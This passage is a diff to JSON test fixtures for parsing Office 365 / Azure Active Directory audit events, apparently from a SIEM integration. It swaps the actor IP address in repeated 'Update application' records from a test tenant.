Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2045249Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620418\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d23b201c-5436-4ecc-a789-18d3f00ea76c\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": 
[\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -19953,9 +19953,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:45:37", "ExtendedProperties": [ { 
@@ -20158,7 +20158,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2045249Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620418\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d23b201c-5436-4ecc-a789-18d3f00ea76c\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": 
[\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2045249Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620418\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d23b201c-5436-4ecc-a789-18d3f00ea76c\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": 
[\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -20188,9 +20188,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:45:37", "ExtendedProperties": [ { 
@@ -20393,7 +20393,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2045249Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620418\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d23b201c-5436-4ecc-a789-18d3f00ea76c\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": 
[\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
